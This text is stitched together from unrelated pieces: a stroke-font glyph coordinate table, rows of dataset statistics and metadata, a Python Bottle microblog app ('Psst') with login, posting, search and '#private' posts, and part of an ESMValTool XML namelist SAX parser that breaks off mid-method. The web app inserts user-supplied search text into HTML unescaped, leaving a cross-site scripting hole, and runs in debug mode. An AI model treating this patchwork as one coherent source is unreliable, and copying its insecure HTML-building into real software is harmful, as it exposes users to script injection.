-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,19, # Ascii 110
4,14, 4, 0,-1,-1, 4,10, 7,13, 9,14,12,14,14,13,15,10,15, 0,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 111
8,14, 6,13, 4,11, 3, 8, 3, 6, 4, 3, 6, 1, 8, 0,11, 0,13, 1,15, 3,16,
6,16, 8,15,11,13,13,11,14, 8,14,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 112
4,14, 4,-7,-1,-1, 4,11, 6,13, 8,14,11,14,13,13,15,11,16, 8,16, 6,15,
3,13, 1,11, 0, 8, 0, 6, 1, 4, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 113
15,14,15,-7,-1,-1,15,11,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4,
3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,13, # Ascii 114
4,14, 4, 0,-1,-1, 4, 8, 5,11, 7,13, 9,14,12,14,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,17, # Ascii 115
14,11,13,13,10,14, 7,14, 4,13, 3,11, 4, 9, 6, 8,11, 7,13, 6,14, 4,14,
3,13, 1,10, 0, 7, 0, 4, 1, 3, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,12, # Ascii 116
5,21, 5, 4, 6, 1, 8, 0,10, 0,-1,-1, 2,14, 9,14,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,19, # Ascii 117
4,14, 4, 4, 5, 1, 7, 0,10, 0,12, 1,15, 4,-1,-1,15,14,15, 0,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,16, # Ascii 118
2,14, 8, 0,-1,-1,14,14, 8, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,22, # Ascii 119
3,14, 7, 0,-1,-1,11,14, 7, 0,-1,-1,11,14,15, 0,-1,-1,19,14,15, 0,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,17, # Ascii 120
3,14,14, 0,-1,-1,14,14, 3, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[9,16, # Ascii 121
2,14, 8, 0,-1,-1,14,14, 8, 0, 6,-4, 4,-6, 2,-7, 1,-7,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,17, # Ascii 122
14,14, 3, 0,-1,-1, 3,14,14,14,-1,-1, 3, 0,14, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[39,14, # Ascii 123
9,25, 7,24, 6,23, 5,21, 5,19, 6,17, 7,16, 8,14, 8,12, 6,10,-1,-1, 7,
24, 6,22, 6,20, 7,18, 8,17, 9,15, 9,13, 8,11, 4, 9, 8, 7, 9, 5, 9, 3,
8, 1, 7, 0, 6,-2, 6,-4, 7,-6,-1,-1, 6, 8, 8, 6, 8, 4, 7, 2, 6, 1, 5,
-1, 5,-3, 6,-5, 7,-6, 9,-7,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2, 8, # Ascii 124
4,25, 4,-7,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[39,14, # Ascii 125
5,25, 7,24, 8,23, 9,21, 9,19, 8,17, 7,16, 6,14, 6,12, 8,10,-1,-1, 7,
24, 8,22, 8,20, 7,18, 6,17, 5,15, 5,13, 6,11,10, 9, 6, 7, 5, 5, 5, 3,
6, 1, 7, 0, 8,-2, 8,-4, 7,-6,-1,-1, 8, 8, 6, 6, 6, 4, 7, 2, 8, 1, 9,
-1, 9,-3, 8,-5, 7,-6, 5,-7,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[23,24, # Ascii 126
3, 6, 3, 8, 4,11, 6,12, 8,12,10,11,14, 8,16, 7,18, 7,20, 8,21,10,-1,
-1, 3, 8, 4,10, 6,11, 8,11,10,10,14, 7,16, 6,18, 6,20, 7,21,10,21,12,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]
]
| 65.530225
| 76
| 0.33256
| 10,844
| 37,942
| 1.163593
| 0.012634
| 1.278016
| 1.872325
| 2.466318
| 0.821049
| 0.811143
| 0.801712
| 0.792439
| 0.784831
| 0.781027
| 0
| 0.378392
| 0.159849
| 37,942
| 578
| 77
| 65.643599
| 0.017442
| 0.02575
| 0
| 0.694056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
a4572f9162dadd3cfbe700bcdc7d618ca3e655fa
| 17,466
|
py
|
Python
|
Psst/main.py
|
jasonkwh/prev-assignments
|
7021ec48b03d882c59ff044f554d73b6884a4919
|
[
"MIT"
] | null | null | null |
Psst/main.py
|
jasonkwh/prev-assignments
|
7021ec48b03d882c59ff044f554d73b6884a4919
|
[
"MIT"
] | null | null | null |
Psst/main.py
|
jasonkwh/prev-assignments
|
7021ec48b03d882c59ff044f554d73b6884a4919
|
[
"MIT"
] | null | null | null |
__author__ = 'Hanxiang Huang'
from bottle import Bottle, template, static_file, request, response, HTTPError
import interface
from database import COMP249Db
from users import check_login, session_user, delete_session, generate_session
application = Bottle()
COOKIE_NAME = 'sessionid'
@application.route('/')
def index():
"""Index of Psst site"""
db = COMP249Db()
username = session_user(db)
loginString = ""
private = "#private" # string that makes the post private
content = ""
http = ""
list = interface.post_list(db, usernick=None, limit=50)
# if user not logged in
if not username:
str = "<h2><b>Welcome to Psst.</b> Latest pssts:</h2>" # title
# display input field for username and password if the user not logged in
loginString = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
str = str + "<table>"
for item in list:
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
# not display the posts with the '#private' tag
if(bool(private.lower() in http.lower())==False):
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + item[
1] + "</i></br></br></td></tr>" # username and contents
users(item[2]) # generate /users/username page by users() function
mentions(item[2]) # generate /mentions/username page by mentions function
# if user logged in
if username:
# display the input field for adding posts instead of the title
str = "<form action='/post' id='postform' method='POST'><input type='postfield' name='post' placeholder='post pssts (you can add #private tag to make the psst privately)' class='focus' onKeyPress='return submitenter(this,event)'></form>"
for item in list:
if(username==item[2]): # if user logged in, display his/her avatar, name, previous posts, the post mention, and logout option
loginString = "<form action= '/logout' id='logoutform' name='logoutform' method='POST' ><table><tr><td><img src='" + item[4] + "' width='85'></td><td><h3>Logged in as " + username + "</h3><p><a href='/users/" + username + "'>Posted pssts</a></p><p><a href='/mentions/" + username + "'>@me pssts</a></p><p><a href='javascript: document.logoutform.submit();'>Logout</a></p></td></tr></table></form>"
str = str + "<table>"
at_user = "@" + username
for item in list:
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
# this if situation is for private message feature
if((bool(private.lower() in http.lower()) == False) | (bool(at_user.lower() in http.lower())) | (bool(private.lower() in http.lower()) & bool(username.lower() in item[2].lower()))):
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + item[
1] + "</i></br></br></td></tr>" # username and contents
users(item[2]) # generate /users/username page by users() function
mentions(item[2]) # generate /mentions/username page by mentions function
str = str + "</table>"
return template('base.tpl', base=str, validate='', login=loginString)
@application.post('/login')
def login():
"""Display this page if any invalid user identification"""
db = COMP249Db()
list = interface.post_list(db, usernick=None, limit=50)
private = "#private" # string that makes the post private
content = ""
http = ""
str = "<h2><b>Welcome to Psst.</b> Latest pssts:</h2>" # title
str = str + "<table>"
# display previous posts
for item in list:
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
# not display the posts with the '#private' tag
if(bool(private.lower() in http.lower())==False): # only display the messages without '#private'
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + item[
1] + "</i></br></br></td></tr>" # username and contents
users(item[2]) # generate /users/username page by users() function
mentions(item[2]) # generate /mentions/username page by mentions function
str = str + "</table>"
# if there are something within the login field...
if 'nick' in request.forms:
username = request.forms['nick'] # get username from the 'nick' field
password = request.forms['password'] # get password from the 'password' field
str2 = "<p style='color:red'>Failed.</p>"
loginString = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
if not check_login(db, username, password):
return template('base.tpl', base=str, validate=str2, login=loginString) # display 'Failed' if invaild user identification
generate_session(db, username) # generate the user session
response.set_header('Location', '/')
response.status = 303
return "Redirect to /" # redirect to /
@application.post('/logout')
def logout():
"""Logout"""
db = COMP249Db()
username = session_user(db) # retrieve user session information from the database
if username:
delete_session(db, username) # remove user session
response.set_header('Location', '/')
response.status = 303
return "Redirect to /" # redirect to /
@application.post('/post')
def add_post():
"""Adding post"""
db = COMP249Db()
username = session_user(db) # retrieve user session information from the database
if username:
content = request.forms['post'] # get user inputs from the input form 'post'
interface.post_add(db, username, content) # add post by post_add function of interface.py
response.set_header('Location', '/')
response.status = 303
return "Redirect to /" # redirect to /
@application.post('/search')
def search():
"""Search feature, can search user name and / or contents"""
db = COMP249Db()
username = session_user(db) # retrieve user session information from the database
private = "#private" # string that makes the post private
loginString = ""
content = ""
http = ""
if 'search' in request.forms:
search = request.forms['search'] # get user inputs from the search field
str = "<h2>Search results for '" + search + "':</h2>" # title
list = interface.post_list(db, usernick=None, limit=50)
if not username: # display the things below only if user not logged in
# display input field for username and password if the user not logged in
loginString = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
str = str + "<table>"
for item in list:
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
# this if situation is for private message feature
if ((bool(private.lower() in http.lower())==False) & ((bool(search.lower() in item[2].lower())) | (bool(search.lower() in http.lower())))):
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + \
item[1] + "</i></br></br></td></tr>" # username and contents
users(item[2]) # generate /users/username page by users() function
mentions(item[2]) # generate /mentions/username page by mentions() function
str = str + "</table>"
if username: # display the things below only if user logged in
at_user = "@" + username
for item in list:
if(username==item[2]): # if user logged in, display his/her avatar, name, previous posts, the post mention, and logout option
loginString = "<form action= '/logout' id='logoutform' name='logoutform' method='POST' ><table><tr><td><img src='" + item[4] + "' width='85'></td><td><h3>Logged in as " + username + "</h3><p><a href='/users/" + username + "'>Posted pssts</a></p><p><a href='/mentions/" + username + "'>@me pssts</a></p><p><a href='javascript: document.logoutform.submit();'>Logout</a></p></td></tr></table></form>"
str = str + "<table>"
for item in list:
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
# this if situation is for private message feature
if (((bool(private.lower() in http.lower()) == False) | (bool(at_user.lower() in http.lower())) | (bool(private.lower() in http.lower()) & bool(username.lower() in item[2].lower()))) & ((bool(search.lower() in item[2].lower())) | (bool(search.lower() in http.lower())))):
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + \
item[1] + "</i></br></br></td></tr>" # username and contents
users(item[2]) # generate /users/username page by users() function
mentions(item[2]) # generate /mentions/username page by mentions() function
str = str + "</table>"
return template('base.tpl', base=str, validate='', login=loginString)
@application.route('/users/<username:path>')
def users(username):
"""Generate the webpage that displays the user posts"""
db = COMP249Db()
uname = session_user(db) # retrieve user session information from the database
loginString = ""
private = "#private" # string that makes the post private
list = interface.post_list(db, usernick=username, limit=50)
list2 = interface.post_list(db, usernick=None, limit=50)
str = ""
for item in list:
str = "<h2><b>" + item[2] + "</b> posted pssts:</h2>" # title
if not uname:
# display input field for username and password if the user not logged in
loginString = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
str = str + "<table>"
content = ""
http = ""
for item in list2:
if (username == item[2]):
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
# not display the posts with the #private tag
if(bool(private.lower() in http.lower())==False):
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + \
item[1] + "</i></br></br></td></tr>" # username and contents
str = str + "</table>"
if uname:
for item in list2:
if(uname==item[2]): # if user logged in, display his/her avatar, name, previous posts, the post mention, and logout option
loginString = "<form action= '/logout' id='logoutform' name='logoutform' method='POST' ><table><tr><td><img src='" + item[4] + "' width='85'></td><td><h3>Logged in as " + uname + "</h3><p><a href='/users/" + uname + "'>Posted pssts</a></p><p><a href='/mentions/" + uname + "'>@me pssts</a></p><p><a href='javascript: document.logoutform.submit();'>Logout</a></p></td></tr></table></form>"
str = str + "<table>"
content = ""
http = ""
for item in list2:
if (username == item[2]): # display the post only if the username and the author is the same person
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + \
item[1] + "</i></br></br></td></tr>" # username and contents
str = str + "</table>"
return template('base.tpl', base=str, validate='', login=loginString)
@application.route('/mentions/<username:path>')
def mentions(username):
"""Generate the webpage that displays @users"""
db = COMP249Db()
uname = session_user(db) # retrieve user session information from the database
private = "#private" # string that makes the post private
loginString = ""
content = ""
http = ""
list = interface.post_list_mentions(db, usernick=username, limit=50)
list2 = interface.post_list(db, usernick=None, limit=50)
str = ""
str = "<h2>These pssts mentioned <b>" + username + "</b>:</h2>" # title
if not uname:
# display input field for username and password if the user not logged in
loginString = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
str = str + "<table>"
for item in list:
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
if(bool(private.lower() in http.lower())==False): # not display the posts with the #private tag
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + item[
1] + "</i></br></br></td></tr>" # username and contents
str = str + "</table>"
if uname:
at_user = "@" + uname
for item in list2:
if(uname==item[2]): # if user logged in, display his/her avatar, name, previous posts, the post mention, and logout option
loginString = "<form action= '/logout' id='logoutform' name='logoutform' method='POST' ><table><tr><td><img src='" + item[4] + "' width='85'></td><td><h3>Logged in as " + uname + "</h3><p><a href='/users/" + uname + "'>Posted pssts</a></p><p><a href='/mentions/" + uname + "'>@me pssts</a></p><p><a href='javascript: document.logoutform.submit();'>Logout</a></p></td></tr></table></form>"
str = str + "<table>"
for item in list:
content = interface.post_to_html(item[3])
http = interface.post_to_html(content)
# this if situation is for private message feature
if((bool(private.lower() in http.lower()) == False) | ((uname==item[2]) & (bool(private.lower() in http.lower()))) | ((bool(at_user.lower() in http.lower())) & (bool(private.lower() in http.lower())))):
str = str + "<tr>"
str = str + "<td valign='top'><img src='" + item[4] + "' width='45'></td>" # user avatar
str = str + "<td valign='bottom'><a href='/users/" + item[2] + "'>@" + item[2] + ": </a>" + http + " - <i>posted on " + item[
1] + "</i></br></br></td></tr>" # username and contents
str = str + "</table>"
return template('base.tpl', base=str, validate='', login=loginString)
@application.route('/static/<filename:path>')
def static(filename):
return static_file(filename=filename, root='static')
if __name__ == '__main__':
application.run(host='localhost', port=8080, debug=True)
| 61.717314
| 417
| 0.582331
| 2,208
| 17,466
| 4.568388
| 0.091033
| 0.026767
| 0.026767
| 0.033905
| 0.838208
| 0.831665
| 0.816794
| 0.807772
| 0.788242
| 0.777635
| 0
| 0.013197
| 0.245105
| 17,466
| 283
| 418
| 61.717314
| 0.751839
| 0.190313
| 0
| 0.787879
| 0
| 0.060606
| 0.344837
| 0.091415
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034632
| false
| 0.030303
| 0.017316
| 0.004329
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4671a928c0178fbe90016c417d1223e45dca1ef
| 346
|
py
|
Python
|
abfahrt/classes/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | 1
|
2022-01-30T14:30:02.000Z
|
2022-01-30T14:30:02.000Z
|
abfahrt/classes/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | null | null | null |
abfahrt/classes/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | null | null | null |
"""
This is the classes-Package that includes all entity classes
"""
from abfahrt.classes.Station import *
from abfahrt.classes.Passenger import *
from abfahrt.classes.Line import *
from abfahrt.classes.Train import *
from abfahrt.classes.TrainInLine import *
from abfahrt.classes.TrainInStation import *
from abfahrt.classes.Travel import *
| 31.454545
| 64
| 0.794798
| 45
| 346
| 6.111111
| 0.422222
| 0.28
| 0.458182
| 0.523636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124277
| 346
| 10
| 65
| 34.6
| 0.907591
| 0.17341
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.142857
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
8efbdd3281b41b96a883fd15667de1c9b00ed28a
| 9,069
|
py
|
Python
|
util/nml-utils/library_nml.py
|
c3s-magic/ESMValTool
|
799150e4784f334262755a39022c72b2d39585c9
|
[
"Apache-2.0"
] | null | null | null |
util/nml-utils/library_nml.py
|
c3s-magic/ESMValTool
|
799150e4784f334262755a39022c72b2d39585c9
|
[
"Apache-2.0"
] | null | null | null |
util/nml-utils/library_nml.py
|
c3s-magic/ESMValTool
|
799150e4784f334262755a39022c72b2d39585c9
|
[
"Apache-2.0"
] | 2
|
2017-03-24T04:18:09.000Z
|
2020-12-19T06:04:05.000Z
|
import pdb
import re
import xml.sax
class NamelistError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class splitDiags(xml.sax.handler.ContentHandler):
""" @brief SAX handler class for parsing ESMValTool namelists
SAX handler class for reading the ESMValTool XML-file and
rewriting each diagnostic to separate xml-files.
"""
def __init__(self):
""" @brief Initialize SAX namelist handler variables
"""
## A dictionary holding the data read from the XML-file
self.namelist_sections = {}
self.namelist_sections["header"] = ""
self.namelist_sections["diags"] = []
self.namelist_sections["footer"] = ""
self.str = ""
self.attributes = None
def startElement(self, name, attr):
""" @brief default SAX startElement event handler
@param name default SAX startElement argument
@param attr default SAX startElement attribute
"""
if name == "namelist":
self.current_location = "header"
self.str = self.str + '<namelist>'
elif name == "diag":
if self.current_location == "header":
self.namelist_sections["header"] = self.str
self.str = '<diag>'
self.current_location = "diag"
else:
self.str = self.str + '<' + name
if attr:
for key in attr.keys():
self.str = self.str + " " + key + '="' + attr[key] + '"'
self.str = self.str + '>'
def characters(self, data):
self.str = self.str + data
def endElement(self, name):
""" @brief default SAX endElement event handler
@param name default SAX endElement argument
"""
if name == "diag":
self.str = self.str + '</diag>\n'
self.namelist_sections["diags"].append(self.str)
self.str = ""
elif name == "namelist":
self.current_location = "footer"
self.namelist_sections["footer"] = self.str + '</namelist>'
self.str = ""
else:
self.str = self.str + '</' + name + '>'
class addModels(xml.sax.handler.ContentHandler):
""" @brief SAX handler class for parsing ESMValTool namelists
SAX handler class for reading the ESMValTool XML-file and
adding models
"""
def __init__(self):
""" @brief Initialize SAX namelist handler variables
"""
## A dictionary holding the data read from the XML-file
self.namelist_sections = {}
self.namelist_sections["header"] = ""
self.namelist_sections["MODELS"] = ""
self.namelist_sections["footer"] = ""
self.str = ""
self.attributes = None
def startElement(self, name, attr):
""" @brief default SAX startElement event handler
@param name default SAX startElement argument
@param attr default SAX startElement attribute
"""
if name == "namelist":
self.current_location = "header"
self.str = self.str + '<namelist>'
elif name == "MODELS":
if self.current_location == "header":
